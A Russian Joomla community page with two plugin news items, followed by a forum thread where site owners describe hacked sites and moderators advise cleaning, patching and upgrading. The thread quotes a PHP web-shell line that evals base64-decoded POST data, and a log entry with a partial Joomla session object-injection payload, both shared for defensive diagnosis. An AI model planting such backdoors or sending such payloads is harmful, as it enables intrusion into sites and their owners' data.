Новости Joomla

Вышел релиз Revo PageBuilder Toolkit for YOOtheme Pro 1.6

Вышел релиз Revo PageBuilder Toolkit for YOOtheme Pro 1.6.2PageBuilder Toolkit - это специализированный плагин для конструктора страниц Yootheme Pro, содержит набор различных утилит для ускорения процесса работы и отладки макета, множественные улучшения в интерфейсе, включая поддержку dark mode, подсказки, быстрая смена разрешения в окне просмотра и много чего еще.v.1.6.2 Что нового?- Индикатор статусов: теперь не просто показывает состояние запросов, но и делает автоматические попытки их отправки при кратковременных сбоях в сети, а если это не помогло, то переводит конструктор в ручной режим, что позволяет сохранит макет и настройки темы прежде чем вы потеряете все, что было сделано с момента последнего сохранения- Подсветка ошибок в макете: плагин анализирует код страницы и может автоматически подсвечивать data атрибуты с кучей мусора, которые попадают в код страницы при копипасте из Figma в TinyMCE (пригодится для старых макетов, в текущей работе плагин сам очищает код мусора). Также есть подсветка семантических ошибок сборки - дубли h1 тега на странице и вложенных друг в друга заголовков.- Улучшена поддержка будущего релиза Yootheme Pro 5 и редактора CodeMirror 6Плагин для русскоязычных пользователей доступен в каталоге расширений SovMart и распространяется за символическую плату (100р). Разработчики Joomla расширений и партнеры автора могут получить плагин бесплатно.Для работы плагина необходим конструктор страниц Yootheme Pro.Разработчик плагина - участник нашего сообщества Александр Судьбинов (@alexrevo), член официальной группы поддержки Yootheme Pro. Страница расширенияОписание на сайте автора@joomlafeed#joomla #yootheme

WT IndexNow плагин для Joomla - отправка страниц сайта на переиндексацию в поисковые системы

WT IndexNow плагин для Joomla - отправка страниц сайта на переиндексацию в поисковые системы

👩‍💻 WT IndexNow плагин для Joomla - отправка страниц сайта на переиндексацию в поисковые системы.Пакет плагинов, обеспечивающий ручную и автоматическую отправку url адресов Joomla в поисковые системы на переиндексацию по протоколу IndexNow. Согласно документации протокол поддерживают все крупнейшие поисковые системы, кроме Google. Протокол служит для получения от сайтов URL, которые нужно переиндексировать заново или проиндексировать в первый раз как можно быстрее. Отправка адресов сайта таким образом существенно ускорит индексацию нового или изменённого контента поисковыми системами.Поисковые системы по этому протоколу обмениваются друг с другом данными, поэтому отправив URL в одну из них вы сообщаете их сразу всем. Протокол IndexNow поддерживают:- Amazon- Microsoft Bing- Naver- Seznam.cz- Yandex - YepСуточный лимит URL - 10000 в сутки. Возможна отправка вручную и автоматически. Поддерживаются:- материалы и категории материалов Joomla- контакты и категории контактов Joomla- SW JProjects - компонент каталога расширений для Joomla- JoomShopping - компонент интернет-магазина для Joomla- Phoca Download - компонент каталога файлоа для Joomla- Phoca Cart - компонент интернет-магазина для Joomla- RadicalMart - компонент интернет-магазина для JoomlaПакет плагинов работает с Joomla 4.3+. Тестировался на Joomla 5 и Joomla 6.Смотреть видео:- ВК Видео- RuTubeСсылки:Страница расширенияGitHub расширенияРаздел Поддержка протокола IndexNow в справке Яндекса@joomlafeed#joomla #seo #indexnow

0 Пользователей и 1 Гость просматривают эту тему.
  • 792 Ответов
  • 292258 Просмотров
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
зачем он ее пофиксил? )
Что бы когда он будет размещать свои скрипты, второй взломщик не помешал ему, например тем же размещением доров или слива трафика, или той же биржой ссылок, это называется шелл в одни руки.
Т.е. он получается, что доступ ко всем файлам на сайте получил? А может он перейти в папки, те, что выше папки с сайтом?
Если взломали, то у чела-взломщика обязательно будут украденные пароли, или это как-то можно так сделать, что без взлома паролей, получаешь доступ?
На счет перемещению сайта, если у вас бональные настройки на сервере то да, последния бага несет в себе RCE - Удаленное выполнение кода, т.е ему даже и пассов от вашей админки не нужно было чтоб залиться, подробней можно почитать http://joomlaforum.ru/index.php/topic,321787.msg1606153/topicseen.html#msg1606153
*

creative3d

  • Захожу иногда
  • 196
  • 6 / 0
второй взломщик не помешал ему
Какие жадные взломщики...
В 3.4.6 нету она закрывает все что было в 3.4.5
Это я пару дней проворонил с апдейтом и меня сразу поймали, шустрые ребята, капец...
Спасибо за ответы.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Не за что.
Не храните более одного сайта на хостинге где нет возможности разграничения прав, и настраивайте vps с разделением по правам пользователей и папок.
*

wishlight

  • Гуру
  • 5075
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
шустрые ребята

Я обновлял ночью. Через 2 часа пришли.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Я обновлял ночью. Через 2 часа пришли.
А что ожидать когда она уже в паблике, ее просто ботнету отдают (а он не спит и не ест  ;D) и чем дольше не обновлять после выхода заплаток тем больше шансов получить взлом.
*

fenix_63

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
  • Верь в себя, и ты чемпион!
flyingspook а ты можешь мне помоч? Я готов даже заплатить.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
flyingspook а ты можешь мне помоч? Я готов даже заплатить.
Могу, подробности в ЛС
*

fenix_63

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
  • Верь в себя, и ты чемпион!
flyingspook отписался в ЛС
« Последнее редактирование: 24.12.2015, 14:43:23 от fenix_63 »
*

lekx

  • Осваиваюсь на форуме
  • 44
  • 0 / 0
Всем добрый день!
Подскажите куда копать. Был вирус на сайте(файлы в разных папках) все удалил. Больше файлов вновь созданных, либо измененных нет. Пароли поменял. Папку tmp почистил. Базу посмотрел ничего не нашёл. И всё равно когда заходишь на сайт, когда подгружается страница внизу пишет ожидается ответ от babybanzclub.nl. А с некоторых страниц переходит на какую-то хрень. Где ещё искать?
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Подскажите куда копать. Был вирус на сайте(файлы в разных папках) все удалил. Больше файлов вновь созданных, либо измененных нет. Пароли поменял. Папку tmp почистил. Базу посмотрел ничего не нашёл. И всё равно когда заходишь на сайт, когда подгружается страница внизу пишет ожидается ответ от babybanzclub.nl. А с некоторых страниц переходит на какую-то хрень. Где ещё искать?
Проверить- отключить установленные расширения, плагины особо проверить- могут быть замаскированные под оф.расширения .
*

rmnk

  • Осваиваюсь на форуме
  • 36
  • 1 / 1
Обнаружил в логах такую запись (см. ниже). там какой-то странный сайт фигурирует (бургер). На что это может указывать, вирус или что-то другое?
*

Doc

  • Захожу иногда
  • 456
  • 17 / 0
Заразили сайт этим кодом
Спойлер
[свернуть]
Что делать ?
Нашел его в шаблоне index.php
Это значит взломали сайт?
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Заразили сайт этим кодом
Спойлер
[свернуть]
Что делать ?
Чистить сайт, закрывать уязвимости и обновлять движок и все расширения.
*

Doc

  • Захожу иногда
  • 456
  • 17 / 0
Чистить сайт, закрывать уязвимости и обновлять движок и все расширения.
Да, по всей видимости весь сайт заразили....Нашел еще в папке cache один файл index.php
Который положили туда 29.12.2015
По содержимому не понимаю что это вот текст файла

Спойлер
[свернуть]
Есть сохранена база и там такого файла нет
Но не пойму, взломали хостинг или просто увели у меня пароли....

*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Чистить сайт, закрывать уязвимости и обновлять движок и все расширения.
Вам уже писали, не надо понимать сами не можете наймите кого либо.
По содержимому не понимаю что это вот текст файла
Что его понимать, торговля ссылками.
*

Doc

  • Захожу иногда
  • 456
  • 17 / 0
А как можно выяснить, как меня взломали?
Сменил пароли, теперь почищу сайт, а через время опять взломают.
Так понимаю, что у них был доступ по ftp, раз там лежали некоторые файлы
Вот и не пойму, это хостинг взломали или все таки меня?...украли пароли у меня?
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Вас скорей всего, любой из ваших сайтов, и хостинг и ftp тут скорей всего не причем, а смотреть и думать исходя из версий движка и расширений + анализ логов. Вовремя обновлять надо cms и расширения, ну и логин/пас не писать admin/12345.
*

Doc

  • Захожу иногда
  • 456
  • 17 / 0
Ну у меня движок версии 1.5,  все патчи установлены.....Дело в том, что в корне сайта лежат в разных папках файлы, которые же через сайт или админку не положишь
Лежал index.php в папках cache, в папке cgi-bin, это папка сервера..... в начале файла index2.php был прописан код
Цитировать
<?php if ($_POST["mquxl"]){eval(base64_decode($_POST["mquxl"]));exit;} if(isset($_GET["z"])){echo "hashdeb : ssHW698=";exit;} ?>
И по всей видимости он там уже прописан с 21.02.2015 года
Был прописан код в templates, в своем стиле, в файле index.php

18 дек 2013 был заражен сервер, может это все пошло от туда, хотя 05.11.2014 есть сохраненный сайт и там нет записей в этих файлах, а вот еще одна база сохранена от 22.02.2015, то там уже есть запись в index2.php
Кому то нравиться меня ломать перед новым годом :)

*

SeBun

  • BanMaster
  • 4030
  • 259 / 5
  • @SeBun48
Ну у меня движок версии 1.5,  все патчи установлены....
Это уже помойка. Минимум, что у вас должно стоять - 2.5.28. Да и то расширения к ней датируются в основном 2012-м годом, делайте выводы. А тот код, что вы показали, говорит о том, что кто то извне получил права на запись и внедрил на ваш сайт строчку, исполняющую любой код из POST-запроса (и кучу помимо него). Переносите сайт на новую версию. Других вариантов нет.
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
@Doc
Вы просто не дочистили сайт во время предыдущих чисток.
*

Doc

  • Захожу иногда
  • 456
  • 17 / 0
Это уже помойка. Минимум, что у вас должно стоять - 2.5.28. Да и то расширения к ней датируются в основном 2012-м годом, делайте выводы. А тот код, что вы показали, говорит о том, что кто то извне получил права на запись и внедрил на ваш сайт строчку, исполняющую любой код из POST-запроса (и кучу помимо него). Переносите сайт на новую версию. Других вариантов нет.
Ну насчет помойки с вами не соглашусь....Им пользуюсь с 2007 года и он мне очень нравиться, а вот новые движки меня просто бесят....Слишком для меня сложный, в 1.5 гораздо все проще.
Сейчас конечно изучаю новую версию движка, хотя уже раньше это пытался делать, но не могу сделать так, что бы мне он нравился....
Для меня Joomla 1.5 версии была самая лучшая, а остальное все фигня полная, как по дизайну, так и по настройкам сайта и т.д
Так, что каждому свое.
*

Lucentezza

  • Новичок
  • 7
  • 0 / 0
Добрый вечер, может кто-нибудь подсказать какие должны быть дальнейшие действия:
сайт Joomla 1.5 отфиксился файлом libraries/joomla/session/session.php, но в логах все равно есть свежий вход с кодом 200
[20/Mar/2016:18:10:44 +0300] 0.308 0.308 200 46.32.225.236 mysite.com GET / HTTP/1.1 "}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\....
Шелл был найден и удален, сайт восстановлен из бэкапа, но проблема уязвимости остается...
Спасибо. Консультация знающего спец-та м.б. на платной основе.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
В вашем случае сначала надо почистить сайт качественно, закрыть все имеющиеся уязвимости и профиксить последней, если вы что то не дочистите и не закроете возможные дыры, то последняя заплатка вам ни как и не поможет.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Добрый вечер, может кто-нибудь подсказать какие должны быть дальнейшие действия:
сайт Joomla 1.5 отфиксился файлом libraries/joomla/session/session.php, но в логах все равно есть свежий вход с кодом 200
[20/Mar/2016:18:10:44 +0300] 0.308 0.308 200 46.32.225.236 mysite.com GET / HTTP/1.1 "}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\....
Шелл был найден и удален, сайт восстановлен из бэкапа, но проблема уязвимости остается...
Спасибо. Консультация знающего спец-та м.б. на платной основе.
Ставте патч против этой баги, наводите профилактические меры работы!
*

Lucentezza

  • Новичок
  • 7
  • 0 / 0
В вашем случае сначала надо почистить сайт качественно, закрыть все имеющиеся уязвимости и профиксить последней, если вы что то не дочистите и не закроете возможные дыры, то последняя заплатка вам ни как и не поможет.
Благодарю за ответ!  flyingspook, напишите, пжта, мне в личку (у меня пока мало сообщений на форуме), если Вы не против, отдам Вам сайт на "качественную очистку" (видимо не все сама вычистила)...
*

SeBun

  • BanMaster
  • 4030
  • 259 / 5
  • @SeBun48
А лучше обновить до последней версии. 1.5 себя изжила в 2012-м году еще...
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

Lucentezza

  • Новичок
  • 7
  • 0 / 0
А лучше обновить до последней версии. 1.5 себя изжила в 2012-м году еще...
Наверно, Вы правы, надо обновляться, тянуть дальше нельзя... А эти вирусы - последний мотивирующий пинок
*

SeBun

  • BanMaster
  • 4030
  • 259 / 5
  • @SeBun48
Наверно, Вы правы, надо обновляться, тянуть дальше нельзя... А эти вирусы - последний мотивирующий пинок
Сейчас актуальная версия 3.5, мигрируйте на нее. Статей по миграции полно, читайте. Сами не справитесь - обращайтесь. Совет: не переносите все подряд на новый сайт, помните, что зловред может быть не только в файлах скриптов, но и в картинках.
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Сейчас актуальная версия 3.5, мигрируйте на нее. Статей по миграции полно, читайте. Сами не справитесь - обращайтесь. Совет: не переносите все подряд на новый сайт, помните, что зловред может быть не только в файлах скриптов, но и в картинках.
И в БД!
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Редирект на спам ссылки. Как лчить?

Автор Евгений1980

Ответов: 2
Просмотров: 2517
Последний ответ 14.02.2024, 13:15:59
от wishlight
Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

Ответов: 110
Просмотров: 71432
Последний ответ 30.08.2023, 12:53:33
от SeBun
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 3496
Последний ответ 25.05.2023, 08:49:57
от Театрал
Re: Кажется вирус на сайте

Автор motokraft

Ответов: 24
Просмотров: 5114
Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
Хостинг пишет, что найден вирус в /media/com_media/js/media-manager-es5.js

Автор AlexP750

Ответов: 6
Просмотров: 3522
Последний ответ 22.02.2022, 11:38:15
от AlexP750